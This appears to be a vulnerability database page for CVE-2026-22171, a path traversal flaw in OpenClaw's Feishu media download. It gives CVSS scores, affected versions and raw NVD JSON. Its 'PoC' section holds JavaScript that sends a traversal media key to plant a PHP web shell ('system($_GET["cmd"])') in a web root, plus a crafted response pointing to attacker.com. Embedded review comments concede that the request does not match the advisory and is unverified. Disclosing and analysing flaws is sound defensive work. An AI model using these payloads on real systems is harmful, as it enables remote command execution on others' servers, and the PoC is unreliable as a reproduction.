Security Vulnerability Report
CVE-2026-22171 CVSS 8.2 HIGH

CVE-2026-22171

Published: 2026-03-18 02:16:21
Last Modified: 2026-03-19 14:52:50

Description

OpenClaw versions prior to 2026.2.19 contain a path traversal vulnerability in the Feishu media download flow where untrusted media keys are interpolated directly into temporary file paths in extensions/feishu/src/media.ts. An attacker who can control Feishu media key values returned to the client can use traversal segments to escape os.tmpdir() and write arbitrary files within the OpenClaw process permissions.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
(This is the Secondary CVSS 3.1 metric. The raw JSON below also carries a Primary CVSS 3.1 metric, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, base score 9.1 CRITICAL, and a CVSS 4.0 metric with base score 8.8 HIGH; triage against the Primary score where your process uses NVD ratings.)

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22171 Path Traversal PoC
// Target: OpenClaw Feishu Media Download
// This PoC demonstrates how an attacker can inject path traversal sequences
// into the media key to write arbitrary files on the server
//
// NOTE(review): the advisory text on this page describes the untrusted input as
// Feishu media key values *returned to the OpenClaw client* and interpolated
// into temporary file paths under os.tmpdir() in extensions/feishu/src/media.ts.
// The HTTP request below instead POSTs to a `/api/feishu/media/download`
// endpoint with `media_key`/`content`/`file_type` JSON fields that the advisory
// does not mention, so that part is not a reproduction of the described flaw;
// only createMaliciousFeishuResponse() (a crafted Feishu API response) matches
// the described attack path. Treat this script as illustrative, not verified.
const http = require('http');

// Attacker's controlled media key with path traversal
// Defender note: a key carrying `..` segments or path separators is exactly what
// the vulnerable code failed to reject before building a temp path. A fix should
// refuse such keys (or derive the temp filename from something other than the raw
// key) and check that the resolved path still lies under os.tmpdir(); the patch
// commits referenced in the raw JSON are not shown on this page, so the exact
// upstream fix is not described here.
const maliciousMediaKey = '../../../../../../var/www/html/shell.php';
const maliciousContent = '<?php system($_GET["cmd"]); ?>';

// Construct the exploit request
// (hostname/port/path are placeholders; nothing on this page documents such an
// endpoint in OpenClaw)
const exploitData = JSON.stringify({
  media_key: maliciousMediaKey,
  content: maliciousContent,
  file_type: 'php'
});

const options = {
  hostname: 'target-server.com',
  port: 3000,
  path: '/api/feishu/media/download',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': Buffer.byteLength(exploitData)
  }
};

// Sends the request and prints the raw response body. The final log line only
// asserts an outcome; the script performs no check that any file was written.
// Per the advisory, a write would be relative to os.tmpdir() and limited to the
// OpenClaw process permissions, so the printed location is an assumption.
const req = http.request(options, (res) => {
  let data = '';
  res.on('data', (chunk) => {
    data += chunk;
  });
  res.on('end', () => {
    console.log('Response:', data);
    console.log('Path traversal payload sent');
    console.log('If successful, shell.php should be written to /var/www/html/');
  });
});
req.write(exploitData);
req.end();

// Alternative: Intercept and modify Feishu API response
// In a real attack, the attacker would control the media key returned
// from the Feishu API to the OpenClaw client, triggering the file write
/**
 * Builds an object shaped like a Feishu API response whose `data.media_key`
 * contains traversal segments. This is the attack path the advisory actually
 * describes: an attacker-influenced value returned to the client, which the
 * vulnerable client interpolated into a temp path. The function is defined
 * but never called in this script.
 *
 * Defender note: validate `media_key` on receipt (reject `..` segments and path
 * separators) and log/alert on rejected keys; the response shape here is the
 * author's sketch, not a documented Feishu schema.
 *
 * @returns {{code: number, msg: string, data: {media_key: string, download_url: string, file_name: string}}}
 */
function createMaliciousFeishuResponse() {
  return {
    code: 0,
    msg: 'success',
    data: {
      media_key: '../../webroot/backdoor.js',
      download_url: 'http://attacker.com/malicious-file',
      file_name: 'exploit.js'
    }
  };
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22171", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:21.310", "lastModified": "2026-03-19T14:52:49.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.19 contain a path traversal vulnerability in the Feishu media download flow where untrusted media keys are interpolated directly into temporary file paths in extensions/feishu/src/media.ts. An attacker who can control Feishu media key values returned to the client can use traversal segments to escape os.tmpdir() and write arbitrary files within the OpenClaw process permissions."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.19 contienen una vulnerabilidad de salto de ruta en el flujo de descarga de medios de Feishu donde las claves de medios no confiables se interpolan directamente en las rutas de archivos temporales en extensions/feishu/src/media.ts. Un atacante que puede controlar los valores de las claves de medios de Feishu devueltos al cliente puede usar segmentos de salto para escapar de os.tmpdir() y escribir archivos arbitrarios dentro de los permisos del proceso de OpenClaw."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": 
"NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", 
"versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/c821099157a9767d4df208c6b12f214946507871", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/cdb00fe2428000e7a08f9b7848784a0049176705", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/ec232a9e2dff60f0e3d7e827a7c868db5254473f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vj3g-5px3-gr46", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-path-traversal-in-feishu-media-temporary-file-naming", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}